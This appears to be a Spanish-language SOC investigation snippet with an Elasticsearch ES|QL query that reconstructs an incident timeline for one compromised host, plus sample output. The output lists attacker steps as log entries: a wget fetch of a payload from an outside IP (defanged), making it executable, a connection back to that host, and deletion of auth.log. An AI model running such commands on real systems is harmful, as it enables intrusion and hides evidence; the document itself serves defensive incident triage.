Timeline de triaje de un host comprometido
Reconstrucción cronológica multicategoría (auth, proceso, red, ficheros) sobre una ventana de incidente, con un campo detail unificado mediante COALESCE para leer el ataque de principio a fin.
Requisitos
Elasticsearch 8.12+, logs ECS multi-sources
SQL
FROM "logs-*"
| WHERE host.name == "srv-app-02"
AND @timestamp >= "2026-06-10T02:00:00Z"
AND @timestamp < "2026-06-10T04:30:00Z"
AND event.category IN ("authentication", "process", "network", "file")
| EVAL detail = COALESCE(
process.command_line,
file.path,
CONCAT(destination.ip, ":", TO_STRING(destination.port)),
event.action)
| KEEP @timestamp, event.category, event.action, user.name, detail
| SORT @timestamp ASC
| LIMIT 200Resultado
@timestamp | event.category | event.action | user.name | detail -------------------------+----------------+-----------------+-----------+---------------------------------------- 2026-06-10T02:07:14.220Z | authentication | ssh-login | deploy | ssh-login 2026-06-10T02:08:02.114Z | process | exec | deploy | sudo su - 2026-06-10T02:09:41.872Z | process | exec | root | wget hxxp://198.51.100.23/agent.bin 2026-06-10T02:09:58.330Z | file | creation | root | /tmp/.cache/agent.bin 2026-06-10T02:10:03.001Z | process | exec | root | chmod +x /tmp/.cache/agent.bin 2026-06-10T02:10:11.448Z | network | connection | root | 198.51.100.23:443 2026-06-10T02:41:09.112Z | file | deletion | root | /var/log/auth.log 2026-06-10T03:55:37.604Z | network | connection | root | 10.2.0.14:5432
SOCInvestigationTimelineTriage